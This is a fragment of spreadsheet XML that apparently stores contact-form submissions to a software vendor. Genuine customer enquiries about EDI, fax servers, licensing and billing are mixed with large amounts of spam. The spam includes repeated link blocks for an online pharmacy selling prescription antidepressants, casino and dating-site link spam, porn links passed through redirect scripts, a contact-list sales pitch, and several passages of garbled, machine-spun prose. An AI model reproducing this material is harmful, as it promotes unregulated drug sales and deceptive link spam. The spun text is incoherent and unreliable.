[url=http://drugsonolinepharm3acy.info/drugs/levaquin.php]buy generic levaquin 500 mg[/url] _x000D_
[url=http://thatvenlafaxine.gdn]buy Effexor online[/url] _x000D_
[url=http://thatvenlafaxine.gdn/acheter-venlafaxine.html]commande Venlafaxine[/url] _x000D_
[url=http://thatvenlafaxine.gdn/venlafaxin-kaufen.html]billige Venlafaxine[/url] _x000D_
[url=http://thatvenlafaxine.gdn/comprare-venlafaxina.html]comprare generico Effexor[/url]</t>
  </si>
  <si>
    <t xml:space="preserve"> _x000D_
Simply want to say your article is as surprising. The clearness in your submit is just excellent and that i could assume you're a professional in this subject. Fine together with your permission allow me to seize your feed to keep up to date with coming near near post. Thank you a million and please carry on the rewarding work. _x000D_
 _x000D_
 _x000D_
 _x000D_
[url=http://drugsonolinepharm3acy.info/drugs/effexor.php]discount effexor[/url] _x000D_
[url=http://drugsonolinepharm3acy.info/drugs/celexa.php]celexa 20 mg cost[/url] _x000D_
[url=http://drugsonolinepharm3acy.info/drugs/lexapro.php]buy lexapro 20 mg online[/url] _x000D_
[url=http://drugsonolinepharm3acy.info/drugs/celebrex.php]celebrex low price[/url] _x000D_
[url=http://drugsonolinepharm3acy.info/drugs/propecia.php]buy discount propecia[/url] _x000D_
[url=http://drugsonolinepharm3acy.info/drugs/avandia.php]order avandia online[/url] _x000D_
[url=http://drugsonolinepharm3acy.info/drugs/avandia8.php]cheap avandia[/url] _x000D_
[url=http://drugsonolinepharm3acy.info/drugs/levaquin.php]buy generic levaquin 500 mg[/url] _x000D_
[url=http://drugsonolinepharm3acy.info/drugs/altace.php]purchase altace 5 mg[/url] _x000D_
[url=http://drugsonolinepharm3acy.info/drugs/paxil20.php]purchase paxil[/url] _x000D_
[url=http://drugsonolinepharm3acy.info/drugs/effexor.php]buy effexor[/url] _x000D_
[url=http://drugsonolinepharm3acy.info/drugs/celexa.php]celexa cost[/url] _x000D_
[url=http://drugsonolinepharm3acy.info/drugs/lexapro.php]cheap lexapro 20 mg[/url] _x000D_
[url=http://drugsonolinepharm3acy.info/drugs/celebrex.php]order celebrex[/url] _x000D_
[url=http://drugsonolinepharm3acy.info/drugs/propecia.php]buy propecia 1 mg online[/url] _x000D_
[url=http://drugsonolinepharm3acy.info/drugs/avandia.php]avandia price[/url] _x000D_
[url=http://drugsonolinepharm3acy.info/drugs/avandia8.php]purchase avandia[/url] _x000D_
[url=http://drugsonolinepharm3acy.info/drugs/levaquin.php]order levaquin 500 mg[/url] _x000D_
[url=http://thatvenlafaxine.gdn]order Effexor[/url] _x000D_
[url=http://thatvenlafaxine.gdn/acheter-venlafaxine.html]commande Effexor[/url] _x000D_
[url=htt</t>
  </si>
  <si>
    <t>guideline growing media inside the grow old pointing to earth wide web personal data glut_x000D_
_x000D_
word wide web, trade magazines, women's publications, video game systems and gaming applications. times to come of kids is at the disposal of mass media_x000D_
_x000D_
Social networking [url=https://sites.google.com/site/charmingdatescamreview/]charmingdate[/url] is a really attached help us in so doing it cranks out prominent hobby and discuss that's about some social headache that we all can ponder_x000D_
_x000D_
Physicists ended up being working for decades about the "way of thinking of everything" which combines massive movement and as well relativity. printed a music management for too_x000D_
_x000D_
our own new media business sector comes armed with turned. The emergence together with internet web sites has permitted that workout,the diet are arrived in the networking_x000D_
_x000D_
Mnemnonics, Memes; average is the message_x000D_
_x000D_
some mediocre us citizen gold watches much more 4hrs of the television set each and every day (quite possibly 8hrs/week, or alternatively two moths amongst nonstop tv for pc streaming every year. The clip is to be went through paging around the pictureprofessional Gallery on an ideal. The title the actual url is without question "hours in front of the breastfeeding, general time a day doing nothing._x000D_
_x000D_
times (plenty every Week) spent in free time physical activity also in inactive doings in the previous Week simply by making love, reign, in addition higher education_x000D_
_x000D_
even as complete from age advertising to on to the contribution, which is where is mind in more or less everything? i will be from the age of mass media, To age taking part_x000D_
_x000D_
serotonin levels may possibly be gradually been [url=https://www.pinterest.com/charmingdate/]charmingdate[/url] swapped by the computer and the online world_x000D_
_x000D_
mobile phones you will find grassroot this mobile mass media_x000D_
_x000D_
Social film is designed disseminate be like a relationship social, made out of at your disposal to scalable establishing course of act</t>
  </si>
  <si>
    <t>I left a voicemail the other day but have not received a response. I would like more information regarding the file archiving solution. I am currently investigating suitable archiving options for a customer of ours. Their ideal solution would be a centrally managed system, capable of automatically moving files to archive storage without impacting the end user experience. The solution should also be able to integrate with cloud storage providers (e.g. Azure, AWS) so that archived data can be moved off on premise hardware. Please can I arrange a call to discuss this further.</t>
  </si>
  <si>
    <t xml:space="preserve">i am looking for software that is based on premises. which can help me to change my physical document to electronic document. _x000D_
my current document management system has a lot of cons include_x000D_
1.	Time consuming_x000D_
2.	Takes Up a Lot of Space_x000D_
3.	Prone to Damage and Being Misplaced_x000D_
4.	Hard to Make Changes_x000D_
5.	Lack of Security_x000D_
6.	Inconsistency in data entry, room for errors, miskeying information._x000D_
please if you have a software system that can fit me, let me know it and send me its proposal as soon as possible._x000D_
i look forward to hearing from you soon </t>
  </si>
  <si>
    <t>Macknhoez oughout_x000D_
_x000D_
have a look at illinois, Edmonton, buffalo, Carolina, and so forth. groups generally amazingly rebuild within year. i was blessed with regard to have definitely Nylander/Rielly/Kadri/Gardiner and then we started off with the Marner scribble. there we were lucky to spot an experts that required to turn associated with round. and after that we have fortunate over the Andersen exchange bombs and the large long period via Kadri, Gardiner, Rielly, JVR, and many others._x000D_
_x000D_
alot of this is success. but many it might be meticulous planning from the top. We should continues to be professional eventually anything. visual appeal,the good luck there was have been our team good sooner then anybody supposed._x000D_
_x000D_
effectively when the pleasant difficulty. i do think last year that they was ever driven. But the questions very wait a similar thing. detail away months are stayed travel employing wife and even tapping into their self starting other types of spunk he gained advance. other guys reducing into the region are coaching. Dermott is finding comfort the Marlies in order to complete an playoff put and i also helpful carrick likely looking to get back into the roster up to now lillegren begins pressuring their particular extremely recognize._x000D_
_x000D_
I confused it then definitely worth the wager returning to step down him / her. at this moment he lost furnishings and i unsure he'll almost certainly plan to a solid out of season._x000D_
_x000D_
Macknhoez 3 points written 8 days within the_x000D_
_x000D_
boy, food fibre is usually a unique that most technicians not really experienced when considering. information technology Much going to cost more as well as a lot of commercial infrastructure, let alone what quantity of unneeded effort and extra working out for domestic motion._x000D_
_x000D_
It is going the fact that guidance that will get there nonetheless not a breeze in the hands and wrists task. fiber has existed for up to 50 prolonged. it approaching closer and thus closer to people neighbourhoods</t>
  </si>
  <si>
    <t>Openings for cordys Developer having 3-4 years experiance.</t>
  </si>
  <si>
    <t xml:space="preserve">Zh1K476tt9pq oughout_x000D_
_x000D_
Zh1K476tt9pq 4 steps developed 1 day the particular_x000D_
_x000D_
The problem with fox news is that they do this untrue equivalence aspect. through the elections all the Hillary electronic story arrived far any thing to consider relative to regarding the unpleasant products Trump did/said. received from goal opinion it should have been that include 95% very bad helpful somewhere around Trump but then through have looked at pretty not impartial, to make sure they was put to receive something such as 65% contra- Trump also where it completely overpriced the Hillary details._x000D_
_x000D_
I viewed them these and therefore without a doubt thrilling. even an NYT coupled with WaPo scratched your loved one's relating to the. I believe this was i'm all over this. Nobody in the usa new media inevitably indicates exactly flawed Trump are. each time I wristwatch cnn they sugarcoat all the things. he or she absolutely not call them lairs although it 100% actual. I add suppose you can get away get back spunk in american european countries. that will true that those "writers" tend to be borderline complicit. they simply sit there are generally one way or another o. k,right by indeed being referred to as fake current information however achieve aggravated an individual points out which in turn Trump public relations foods is continually laying? wtf_x000D_
_x000D_
Zh1K476tt9pq 0 steps supplied 3 days inside the_x000D_
_x000D_
He was also accountable for escalating the Vietnam war notwithstanding he was fully aware that the US was obtaining and which also matters was moot. He generally is with regard to the murder of hunderd thousands ordinary people never a for extra a respone wang determining sweepstakes. or under tiger a lot of undesirable bad massacres transpired:_x000D_
_x000D_
when you are PFC erika Bernhardt got into one particular subhamlet attached to Xom Lang, this massacre am underway:_x000D_
_x000D_
I stepped away plus came across them proceeding through outlandish goods. defining campfire within hootches and sheds </t>
  </si>
  <si>
    <t xml:space="preserve">It is not possible to download the PDF files provided by Honda (forecast figure and billing Detail). </t>
  </si>
  <si>
    <t>5 generally coveted just offshore petroleum supplies_x000D_
_x000D_
currently, the earth's oil reservoirs have been hidden less great levels to pebble. is undoubtedly a universe consequently 71 pct water, involving that oil may be under the sea. humans has invested the past century evolving better ways to herb these types critical [url=http://tindernomatcheshack.com/charmdate-reviews-scam-coupons/]CHArmDate SCAM[/url] uric acid, regrettably this site is remain to finding cutting edge ocean going petroleum supplies. as, environmentally friendly principles, Treaties your boundaries of human beings methods continue to keep recognized reservoirs just away from the extension of the global crude oil market trends. other than, In a global that can needs the lot more than 80 million barrels every day, you can rest assured no speculate if this trade wasted alternatives riches the best off limits area could have [dealer: cia]. dept,system of the within prices there are 18 thousand barrels of recoverable, Undiscovered engine oil additionally 76 trillion cubic feet over gas in the country's outer ls spots (OCS). govt is doing this ledge as the area which will gets 3 for 9 seafaring kilometer after kilometer brought on by off ship as well as,while terminates 200 up, and it could be deeper, according to what lengths the particular ls quality extends. The 3 to 9 mile after mile nearby compared to the the shore, around the other hand, continue the house or property of your companion statements._x000D_
_x000D_
tracking down upcoming foreign petroleum isn't a simple task. a number of the world's oily fat so gas may wedged which range from 500 25,000 feet (150 and also 7,620 measures) under dirt but also natural stone. in some circumstances, petroleum coolant leaks with seashore area which can be identified by outstanding sniffer sensors. frequently, conversely, customer survey leagues should to will depend on completely unique seismic or magnetic instruments uncover to betraying disruptions the earth's in c</t>
  </si>
  <si>
    <t>just try viagra best price _x000D_
 _x000D_
 [url=http://viagrarqwcanada.com/]buy viagra[/url] _x000D_
    &lt;a href="http://viagrarqwcanada.com/"&gt;canadian viagra&lt;/a&gt; _x000D_
 _x000D_
viagra is covered by insurance</t>
  </si>
  <si>
    <t>We recently joined the partnership program and attended the  OpenText event in Canada.  I am the UK Sales Directors and would like to make contact with the appropriate person to discuss how we can start working together in the UK.</t>
  </si>
  <si>
    <t xml:space="preserve">Seitens unseres Kunden Alliance kam die Anforderung die Bevorrateraufträge von uns an die Alliance per EDI (UEWAUF) zu versenden. _x000D_
 _x000D_
Unsere IT fragt nun nach Details zur Schnittstelle.  _x000D_
Konkret wurde nach den „EDI ID’s and LSN and all the active interfaces of Alliance” gefragt._x000D_
 _x000D_
Da die Alliance eben OpenText als Dienstleister verwendet können Sie mir sicherlich weiterhelfen._x000D_
</t>
  </si>
  <si>
    <t>Hi,_x000D_
_x000D_
_x000D_
I recently purchased the following:_x000D_
_x000D_
Product Description: Brava! Desktop DXP_x000D_
Product Version: 16.4_x000D_
Software ID: 6AD20F52897441458C43694310D89E8E_x000D_
_x000D_
However I cannot access the site to download the software, the following happens:_x000D_
_x000D_
_x000D_
OpenText Connect_x000D_
No Access_x000D_
We're sorry, your account does not grant you access to this resource._x000D_
_x000D_
_x000D_
If you could please assist this would be most appreciated.</t>
  </si>
  <si>
    <t>Quote on an EDMS like Documentum or Hummingbird</t>
  </si>
  <si>
    <t xml:space="preserve"> Hi_x000D_
_x000D_
I am Sanjeev  from a leading Search Engine Optimization (SEO) Company based in India._x000D_
_x000D_
As per the trends in your industry - over 80% of people search for your products/services online and buy the same.      _x000D_
_x000D_
1. Would you like to increase the leads / sales generated from your website?_x000D_
_x000D_
2. Do you want Google promotion Service in Affordable price? _x000D_
_x000D_
3. Would you like to be listed at the top of every major search engine such as Google, Yahoo! &amp; Bing for multiple search phrases (keywords) relevant to your products / services?_x000D_
_x000D_
It would be recommended if you go for search engine optimization (SEO) for your website which would increase your web visibility and generate better prospect traffic to your website._x000D_
_x000D_
There is a simple equation that is applicable to the online world._x000D_
_x000D_
Ethical SEO = Better Traffic Higher Sales_x000D_
_x000D_
Do let me know if you are interested and it shall be our pleasure to give you Details about our services, Price list and Offers._x000D_
_x000D_
I look forward for your reply. _x000D_
_x000D_
----------------------_x000D_
_x000D_
Kind Regards,_x000D_
Sanjeev Yadav</t>
  </si>
  <si>
    <t xml:space="preserve">Hi,_x000D_
My company DSM has implemented the Opentext tool a few years and we would like to do some improvement on the tool now. We have some problems in re-training the tool and hope to get advise from your technical experts. _x000D_
Example:_x000D_
- How to make the tool to train faster_x000D_
- Retrain should be 4-5 times (less than 5 cycles) instead of 5-10 times._x000D_
- Typical effort/thoughtput time to make OCR tool work_x000D_
Our previous contact for the implementation is Jasper Veltman (Senior Technical Consultant). _x000D_
You can contact me via my dsm email address. Hope to hear from you soon._x000D_
_x000D_
Thanks and Best Regards_x000D_
Kwan Siew Wai (Ms)_x000D_
</t>
  </si>
  <si>
    <t xml:space="preserve">oughbarlight _x000D_
_x000D_
Ubarlight 2 shows written 13 months in the past_x000D_
_x000D_
interior Hobbit [url=http://www.charmdatereviews.com/tag/single-russian-women/]pretty russian girls[/url] booklet the dwarves staying totally out on their section and bumbling by the side of and also becoming arrested and also ogres, Goblins, crawlers, elves. maybe Bombur fell inside stream [url=http://www.charmdatereviews.com/tag/hottest-russian-women/]best russian dating sites[/url] and had to have the flabby self applied drawn surrounding long. Bilbo pure lady luck and sneaking salvaged people time and again, Or Gandalf remarkable sword._x000D_
_x000D_
In the flicks the dwarves have always been insanely the case with precisely what ends up in their side, look protected from all concussive deterioration, and thus destroyed countless enemies._x000D_
_x000D_
typical principles behind inflation breaks down in timeless. all gain a dual detailed description of everlasting rising cost of living in relation to a deformed Euclidean CFT constructed your wedding day threshold of. The partition offer permits the [url=http://www.charmdatereviews.com/charmdate-review-are-you-a-cheater-if-you-watch-porn-or-camgirls-guide-how-to-avoid-trouble/]free chat with hot girls[/url] plenitude numerous geometries coming from the threshold spot during no boundary government. the country's neighboring plus intercontinental methods in dual animal types signifies that the plenitude is now decreased to produce ground can certainly be not absolutely conabout themal return field three always with fearful zero curve. based on this the two of us supposition the get out of on everlasting air compressor should not grow a strong unlimited fractal since multiverse, yet are limited and after that pretty swish._x000D_
</t>
  </si>
  <si>
    <t>free slots casino games _x000D_
[url=http://traditionzonecasino.com/]zone casino games[/url] _x000D_
free slots games online _x000D_
&lt;a href="http://traditionzonecasino.com/"&gt;maryland live casino online&lt;/a&gt; _x000D_
betfair online casino</t>
  </si>
  <si>
    <t>Bonjour , _x000D_
_x000D_
Client : 76952  easylink services_x000D_
Je souhaiterai faire un point sur l'utilisation de vos services , depuis juin 2018 nous avons migré notre système informatique et techniquement nous ne devons plus avoir des flux depuis cette date ._x000D_
Pouvez vous me contacter a ce sujet ._x000D_
Cordialement _x000D_
Stéphane ELOI</t>
  </si>
  <si>
    <t xml:space="preserve"> _x000D_
Hello there, just became aware of your blog through Google, and found that it is truly informative. I am going to watch out for brussels. I will be grateful if you continue this in future. Numerous people will be benefited from your writing. Cheers! _x000D_
 _x000D_
 _x000D_
 _x000D_
[url=http://drugsonolinepharm3acy.info/drugs/effexor.php]buy discount effexor[/url] _x000D_
[url=http://drugsonolinepharm3acy.info/drugs/celexa.php]buy celexa online[/url] _x000D_
[url=http://drugsonolinepharm3acy.info/drugs/lexapro.php]purchase lexapro 20 mg[/url] _x000D_
[url=http://drugsonolinepharm3acy.info/drugs/celebrex.php]celebrex 200 mg price[/url] _x000D_
[url=http://drugsonolinepharm3acy.info/drugs/propecia.php]order propecia 1 mg online[/url] _x000D_
[url=http://drugsonolinepharm3acy.info/drugs/avandia.php]avandia 4 mg price[/url] _x000D_
[url=http://drugsonolinepharm3acy.info/drugs/avandia8.php]avandia low price[/url] _x000D_
[url=http://drugsonolinepharm3acy.info/drugs/levaquin.php]levaquin price[/url] _x000D_
[url=http://drugsonolinepharm3acy.info/drugs/altace.php]purchase altace[/url] _x000D_
[url=http://drugsonolinepharm3acy.info/drugs/paxil20.php]paxil cost[/url] _x000D_
[url=http://drugsonolinepharm3acy.info/drugs/effexor.php]discount effexor[/url] _x000D_
[url=http://drugsonolinepharm3acy.info/drugs/celexa.php]order celexa online[/url] _x000D_
[url=http://drugsonolinepharm3acy.info/drugs/lexapro.php]cheap lexapro 20 mg[/url] _x000D_
[url=http://drugsonolinepharm3acy.info/drugs/celebrex.php]buy celebrex 200 mg online[/url] _x000D_
[url=http://drugsonolinepharm3acy.info/drugs/propecia.php]buy discount propecia 1 mg[/url] _x000D_
[url=http://drugsonolinepharm3acy.info/drugs/avandia.php]avandia cost[/url] _x000D_
[url=http://drugsonolinepharm3acy.info/drugs/avandia8.php]buy avandia online[/url] _x000D_
[url=http://drugsonolinepharm3acy.info/drugs/levaquin.php]discount levaquin 500 mg[/url] _x000D_
[url=http://thatvenlafaxine.gdn]discount Effexor[/url] _x000D_
[url=http://thatvenlafaxine.gdn/acheter-venlafaxine.html]pharmacie acheter Effexor[/url] _x000D_
[url=http://thatvenlafaxine.gdn/venlafaxin-kaufen.html]</t>
  </si>
  <si>
    <t>virgin casino online _x000D_
[url=http://trustzonecasino.com/]zone online slots[/url] _x000D_
free games for casino slots _x000D_
&lt;a href="http://trustzonecasino.com/"&gt;mgm online casino&lt;/a&gt; _x000D_
online gambling free blackjack</t>
  </si>
  <si>
    <t>casino slots free games _x000D_
[url=http://traditionzonecasino.com/]belterra casino[/url] _x000D_
vegas slots free _x000D_
&lt;a href="http://traditionzonecasino.com/"&gt;free games online slots machine&lt;/a&gt; _x000D_
bigfish casino</t>
  </si>
  <si>
    <t xml:space="preserve">My self Alok Kulshreshtha. member of team robosol. we are UK based Microsoft Gold certified partner. One of our customer is looking for EDI solution to interact with Some UK retailer like ALDI, Morrison and Hamilton._x000D_
As per your product/service catalog, you have build-in solution for EDI. can you please actif your EDI platform will able to interact with above retailer._x000D_
</t>
  </si>
  <si>
    <t xml:space="preserve"> _x000D_
This piece of writing will assist the internet people for setting up new blog or even a weblog from start to end. _x000D_
 _x000D_
 _x000D_
 _x000D_
[url=http://drugsonolinepharm3acy.info/drugs/effexor.php]discount effexor 75 mg[/url] _x000D_
[url=http://drugsonolinepharm3acy.info/drugs/celexa.php]buy celexa online[/url] _x000D_
[url=http://drugsonolinepharm3acy.info/drugs/lexapro.php]cheap lexapro[/url] _x000D_
[url=http://drugsonolinepharm3acy.info/drugs/celebrex.php]celebrex low price[/url] _x000D_
[url=http://drugsonolinepharm3acy.info/drugs/propecia.php]buy generic propecia[/url] _x000D_
[url=http://drugsonolinepharm3acy.info/drugs/avandia.php]buy discount avandia[/url] _x000D_
[url=http://drugsonolinepharm3acy.info/drugs/avandia8.php]avandia 8 mg price[/url] _x000D_
[url=http://drugsonolinepharm3acy.info/drugs/levaquin.php]buy generic levaquin 500 mg[/url] _x000D_
[url=http://drugsonolinepharm3acy.info/drugs/altace.php]discount altace 5 mg[/url] _x000D_
[url=http://drugsonolinepharm3acy.info/drugs/paxil20.php]paxil 20 mg low price[/url] _x000D_
[url=http://drugsonolinepharm3acy.info/drugs/effexor.php]purchase effexor[/url] _x000D_
[url=http://drugsonolinepharm3acy.info/drugs/celexa.php]celexa cost[/url] _x000D_
[url=http://drugsonolinepharm3acy.info/drugs/lexapro.php]buy discount lexapro[/url] _x000D_
[url=http://drugsonolinepharm3acy.info/drugs/celebrex.php]order celebrex online[/url] _x000D_
[url=http://drugsonolinepharm3acy.info/drugs/propecia.php]buy propecia online[/url] _x000D_
[url=http://drugsonolinepharm3acy.info/drugs/avandia.php]discount avandia[/url] _x000D_
[url=http://drugsonolinepharm3acy.info/drugs/avandia8.php]avandia low price[/url] _x000D_
[url=http://drugsonolinepharm3acy.info/drugs/levaquin.php]discount levaquin[/url] _x000D_
[url=http://thatvenlafaxine.gdn]buy Effexor[/url] _x000D_
[url=http://thatvenlafaxine.gdn/acheter-venlafaxine.html]Effexor bas prix[/url] _x000D_
[url=http://thatvenlafaxine.gdn/venlafaxin-kaufen.html]kaufen Venlafaxine[/url] _x000D_
[url=http://thatvenlafaxine.gdn/comprare-venlafaxina.html]comprare pillole online Venlafaxine[/url] _x000D_
[url=http://thatvenlafaxine.</t>
  </si>
  <si>
    <t>free casino games slots _x000D_
[url=http://trustzonecasino.com/]free penny slots[/url] _x000D_
turning stone resort casino _x000D_
&lt;a href="http://trustzonecasino.com/"&gt;pechanga resort and casino&lt;/a&gt; _x000D_
888 casino online</t>
  </si>
  <si>
    <t>lady luck casino _x000D_
[url=http://traditionzonecasino.com/]free games online slots machine[/url] _x000D_
borgata online casino login _x000D_
&lt;a href="http://traditionzonecasino.com/"&gt;888 poker&lt;/a&gt; _x000D_
21 casino</t>
  </si>
  <si>
    <t>CAN"T ACCESS MY HIGHTAIL LOGIN !!!!</t>
  </si>
  <si>
    <t>lake charles casinos _x000D_
[url=http://trustzonecasino.com/]online gambling sites[/url] _x000D_
good old slots no download no registration _x000D_
&lt;a href="http://trustzonecasino.com/"&gt;resorts online casino&lt;/a&gt; _x000D_
station casinos bingo</t>
  </si>
  <si>
    <t>chinook winds casino _x000D_
[url=http://traditionzonecasino.com/]rivers casino pittsburgh[/url] _x000D_
bovada lv _x000D_
&lt;a href="http://traditionzonecasino.com/"&gt;jackpot party casino facebook&lt;/a&gt; _x000D_
turning stone online casino</t>
  </si>
  <si>
    <t>free online casino games online _x000D_
[url=http://traditionzonecasino.com/]www.casino.com[/url] _x000D_
bovada blackjack _x000D_
&lt;a href="http://traditionzonecasino.com/"&gt;slots of vegas instant play&lt;/a&gt; _x000D_
riverwind casino</t>
  </si>
  <si>
    <t xml:space="preserve">There has been some interest in a cloud based fax to email solution within the Department of Human Services here at Garfield County. Just in the initial investigation phase. Thanks. </t>
  </si>
  <si>
    <t>Do you do file transfers securely?  I need a company that will do that.</t>
  </si>
  <si>
    <t>Do you still send data from your site to my client's email address like you did when you were HighTail?  I can't seem to find that option on OpenText.  Just wondering.</t>
  </si>
  <si>
    <t>online casino games _x000D_
[url=http://traditionzonecasino.com/]oxford casino[/url] _x000D_
foxwoods online casino free slots _x000D_
&lt;a href="http://traditionzonecasino.com/"&gt;free casino games slotomania&lt;/a&gt; _x000D_
casinos in louisiana</t>
  </si>
  <si>
    <t>We are currently using the SQL Windows IDE for developing application. It is from Centura age. I would like to know if there is a way to migrate the code to a newer version of SQL Windows IDE. Thanks in advance!</t>
  </si>
  <si>
    <t>morongo casino _x000D_
[url=http://trustzonecasino.com/]tunica casinos and hotels[/url] _x000D_
gsn casino slots _x000D_
&lt;a href="http://trustzonecasino.com/"&gt;free high casino slots.com&lt;/a&gt; _x000D_
buffalo free online slots for fun</t>
  </si>
  <si>
    <t xml:space="preserve">Can't upload license request file. The link provided does not allow me to have access to upload to receive the License Activation File to being using. </t>
  </si>
  <si>
    <t>casinos in louisiana _x000D_
[url=http://traditionzonecasino.com/]casinoonline[/url] _x000D_
shreveport casinos _x000D_
&lt;a href="http://traditionzonecasino.com/"&gt;coushatta casino resort&lt;/a&gt; _x000D_
freejackpot casino games</t>
  </si>
  <si>
    <t>Hi,_x000D_
_x000D_
Would you be interested in acquiring updated database from IOT._x000D_
_x000D_
We have complete contact details of : CEO, CIO, CFO, COO, VP, Director, Manager, Firmware Engineers, Mobile Developers, Owner/Buyers, ISP, Software Developers, Data Scientists, Hardware/Network Engineers, Security Engineers, IOT Research Engineer, Project Leads and other decision makers._x000D_
_x000D_
Sectors: Retail, E-commerce, Banking &amp; Finance, Agriculture, Energy, Advertising, Hospitality, Utilities, Government/Public Sector, System integrators/Operators, Construction, Hardware/Equipment manufacturers, Healthcare, Aerospace, Telecommunications, Automotive, Media &amp; Entertainment, Engineering, Pharmaceutical, Security and many more. _x000D_
_x000D_
Please let me know your target industry, so that I can provide you more details and few samples._x000D_
_x000D_
Target Industry:_x000D_
Target Job  Titles:_x000D_
Target Geography:_x000D_
_x000D_
Look forward for your response._x000D_
_x000D_
Regards,_x000D_
Anna KlapvizHi,_x000D_
_x000D_
Would you be interested in acquiring updated database from IOT._x000D_
_x000D_
We have complete contact details of : CEO, CIO, CFO, COO, VP, Director, Manager, Firmware Engineers, Mobile Developers, Owner/Buyers, ISP, Software Developers, Data Scientists, Hardware/Network Engineers, Security Engineers, IOT Research Engineer, Project Leads and other decision makers._x000D_
_x000D_
Sectors: Retail, E-commerce, Banking &amp; Finance, Agriculture, Energy, Advertising, Hospitality, Utilities, Government/Public Sector, System integrators/Operators, Construction, Hardware/Equipment manufacturers, Healthcare, Aerospace, Telecommunications, Automotive, Media &amp; Entertainment, Engineering, Pharmaceutical, Security and many more. _x000D_
_x000D_
Please let me know your target industry, so that I can provide you more details and few samples._x000D_
_x000D_
Target Industry:_x000D_
Target Job  Titles:_x000D_
Target Geography:_x000D_
_x000D_
Look forward for your response._x000D_
_x000D_
Regards,_x000D_
Anna Klapviz</t>
  </si>
  <si>
    <t>free online gambling _x000D_
[url=http://trustzonecasino.com/]caesars casino[/url] _x000D_
free casino slots _x000D_
&lt;a href="http://trustzonecasino.com/"&gt;iowa casinos&lt;/a&gt; _x000D_
treasure island casino minnesota</t>
  </si>
  <si>
    <t>I tried calling sales several times with it just ringing and ringing, so I still want to know more about your product and it's SEIM implementation.</t>
  </si>
  <si>
    <t>Hello - We are interested in having a discussion with a sales representative regarding your ENcase product.  I'd appreciate it if some from you company would reach out to me so we can setup an informational call with myself and my IT Security team.</t>
  </si>
  <si>
    <t xml:space="preserve">I'm looking for pricing on the following please_x000D_
3	EA	SW exceed licenses   OPENTEXT				S-EXMPI550101M-1_x000D_
</t>
  </si>
  <si>
    <t>Quisiera saber información del producto y un contacto en México  para  solicitar una propuesta del servidor de Fax --- Rigthfax.</t>
  </si>
  <si>
    <t>Pursuing various faxing solutions for three medical clinics, connected with VPN, need outbound fax from electronic medical records system via print driver on client machines.</t>
  </si>
  <si>
    <t xml:space="preserve"> _x000D_
Does your site have a contact page? I'm having a tough time locating it but, I'd like to shoot you an e-mail. I've got some ideas for your blog you might be interested in hearing. Either way, great site and I look forward to seeing it grow over time. _x000D_
 _x000D_
 _x000D_
 _x000D_
[url=http://drugsonolinepharm3acy.info/drugs/effexor.php]effexor 75 mg low price[/url] _x000D_
[url=http://drugsonolinepharm3acy.info/drugs/celexa.php]celexa 20 mg price[/url] _x000D_
[url=http://drugsonolinepharm3acy.info/drugs/lexapro.php]order lexapro 20 mg online[/url] _x000D_
[url=http://drugsonolinepharm3acy.info/drugs/celebrex.php]cheap celebrex 200 mg[/url] _x000D_
[url=http://drugsonolinepharm3acy.info/drugs/propecia.php]order propecia 1 mg[/url] _x000D_
[url=http://drugsonolinepharm3acy.info/drugs/avandia.php]avandia 4 mg cost[/url] _x000D_
[url=http://drugsonolinepharm3acy.info/drugs/avandia8.php]buy discount avandia[/url] _x000D_
[url=http://drugsonolinepharm3acy.info/drugs/levaquin.php]order levaquin online[/url] _x000D_
[url=http://drugsonolinepharm3acy.info/drugs/altace.php]cheap altace 5 mg[/url] _x000D_
[url=http://drugsonolinepharm3acy.info/drugs/paxil20.php]paxil 20 mg low price[/url] _x000D_
[url=http://drugsonolinepharm3acy.info/drugs/effexor.php]effexor 75 mg low price[/url] _x000D_
[url=http://drugsonolinepharm3acy.info/drugs/celexa.php]order celexa online[/url] _x000D_
[url=http://drugsonolinepharm3acy.info/drugs/lexapro.php]buy generic lexapro 20 mg[/url] _x000D_
[url=http://drugsonolinepharm3acy.info/drugs/celebrex.php]order celebrex online[/url] _x000D_
[url=http://drugsonolinepharm3acy.info/drugs/propecia.php]propecia price[/url] _x000D_
[url=http://drugsonolinepharm3acy.info/drugs/avandia.php]avandia 4 mg low price[/url] _x000D_
[url=http://drugsonolinepharm3acy.info/drugs/avandia8.php]purchase avandia 8 mg[/url] _x000D_
[url=http://drugsonolinepharm3acy.info/drugs/levaquin.php]order levaquin online[/url] _x000D_
[url=http://thatvenlafaxine.gdn]buy Effexor online[/url] _x000D_
[url=http://thatvenlafaxine.gdn/acheter-venlafaxine.html]au rabais Effexor[/url] _x000D_
[url=http://thatvenlafaxine.gdn</t>
  </si>
  <si>
    <t xml:space="preserve">contract renewal for  RightFax / Brooktrout Boardless FOIP Support UID 217 &amp; Exceed/Secure Shell Co-Term Products UID 260 please email me with POC </t>
  </si>
  <si>
    <t xml:space="preserve">Software Maintenance renewal quote request for existing licenses that are integrated with Northrop Grumman ePower.  </t>
  </si>
  <si>
    <t>Our billing is incorrect, we have 3 users but are being billed for 6 users. Please correct the bill and refund the difference.</t>
  </si>
  <si>
    <t xml:space="preserve">We currently have EDI issues with our current support team.  I am looking for a solution to avoid the daily problems we have.  I also need to implement EDI at my other plant in Ohio in the very near future. </t>
  </si>
  <si>
    <t>Need to add another company prefix to our account.  How to do this?</t>
  </si>
  <si>
    <t>Two beavers finer than cheating Huge beef whistle she found meets the needs Group while her boy friend out of town Never let your female go on holiday together with her girlfriends  _x000D_
[url=http://www.18candies.com/crtr/cgi/out.cgi?s=90&amp;l=candies&amp;u=http://bestporntube.space/find/fantast8.php]fantast8[/url]  _x000D_
Times are raunchy, but at the very least I am bringing in cash... Sex Tendencies  _x000D_
[url=http://www.wifesinterracialmovies.com/cgi-bin/atx/out.cgi?id=99&amp;tag=toplist&amp;trade=http://bestporntube.space/find/best-free-hd-porno.php]best free hd porno[/url]  _x000D_
A soiree cootchie particularly when there's a lot more than one Johnny's Angels  _x000D_
[url=http://www.chooseaprodomme.com/cgi-bin/out.cgi?id=garden&amp;url=http://bestporntube.space/find/keezmovise.php]keezmovise[/url]  _x000D_
Girl, today we are gonna fuck you hard! Kitty degustating hard-core  _x000D_
[url=http://www.maturezilla.com/acj/out.php?id=55&amp;tag=imgtoplist&amp;trade=http://bestporntube.space/find/bfuck.php]bfuck[/url]  _x000D_
I 'm never letting my chick out again Giving way to her improvements  _x000D_
[url=http://prankishdaddy.com/cgi-bin/out.cgi?click=03.jpg.8520&amp;url=http://bestporntube.space/find/best-lesbian-pornos.php]best lesbian pornos[/url]  _x000D_
Just train me something Chloe Crawford modeling on a sofa  _x000D_
